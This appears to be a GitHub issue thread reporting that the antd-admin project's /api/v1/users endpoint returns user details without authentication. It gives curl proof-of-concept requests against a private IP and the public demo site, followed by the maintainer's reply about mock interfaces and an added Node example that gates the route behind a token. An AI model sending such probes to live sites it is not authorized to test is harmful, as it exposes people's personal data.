Unauthorized access to some frontend interfaces was found. Procedure
L0ading-x opened this issue · 1 comment
L0ading-x commented
- Unauthorized access to some frontend interfaces leads to leakage of sensitive information
- Installed according to the official documents

2.1 Unauthorized access is found on some interfaces. For example:

/api/v1/users

The PoC is:

```shell
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' http://192.168.0.125:7001/api/v1/users
```

2.2 At this point you can see some information returned, such as the user ID, name, age, phone number, address and other sensitive information.

2.3 It can also be reproduced on the official sample site:

https://antd-admin.zuiidea.com/login?from=

The PoC is:

```shell
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://antd-admin.zuiidea.com/api/v1/users
```
superlbr commented
ah... it's a frontend project; it uses mock interfaces just for dev. Unauthorized access is something to do with the backend.
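The thread above shows a dev mock endpoint (`/api/v1/users`) answering anonymous requests with a full user list, and the maintainer's point that the fix belongs with whoever serves the API. The following is an added example, not antd-admin's own code: a minimal Node handler that gates the same route behind a bearer token and returns only listing fields, so a mock that is accidentally exposed leaks nothing. The user records, the token and the `handle`/`startServer` names are all assumptions.

```javascript
// Added example (not the project's code): an authentication gate and a
// field whitelist in front of a mock GET /api/v1/users endpoint.

// Constructed sample data standing in for a mock user list.
const USERS = [
  { id: 1, name: "Alice", age: 31, phone: "555-0100", address: "1 Main St" },
  { id: 2, name: "Bob", age: 44, phone: "555-0101", address: "2 High St" },
];

// Constructed dev-only token (assumption); a real backend would validate a
// session or a signed token rather than a static string.
const VALID_TOKENS = new Set(["dev-token-123"]);

// True only when the request carries "Authorization: Bearer <known token>".
// Node lowercases incoming header names, so the lookup key is lowercase.
function isAuthorized(headers) {
  const [scheme, token] = String(headers["authorization"] || "").split(" ");
  return scheme === "Bearer" && VALID_TOKENS.has(token);
}

// Whitelist the fields a listing view needs; phone and address never leave
// the server even when the caller is authenticated.
function publicView(user) {
  const { id, name, age } = user;
  return { id, name, age };
}

// Route handler as a pure function so it can be tested without sockets.
// Returns { status, body } for the given method, path and headers.
function handle(method, url, headers) {
  if (method !== "GET" || url !== "/api/v1/users") {
    return { status: 404, body: { error: "not found" } };
  }
  if (!isAuthorized(headers)) {
    return { status: 401, body: { error: "authentication required" } };
  }
  return { status: 200, body: USERS.map(publicView) };
}

// Wraps the handler in an HTTP server; call startServer(7001) to run it.
// The require is deferred so defining this function has no side effects.
function startServer(port) {
  const http = require("http");
  return http.createServer((req, res) => {
    const { status, body } = handle(req.method, req.url, req.headers);
    res.writeHead(status, { "Content-Type": "application/json" });
    res.end(JSON.stringify(body));
  }).listen(port);
}
```

With the server running, the anonymous `curl` from the report receives `401` with no user data, while a request carrying the token receives only `id`, `name` and `age`.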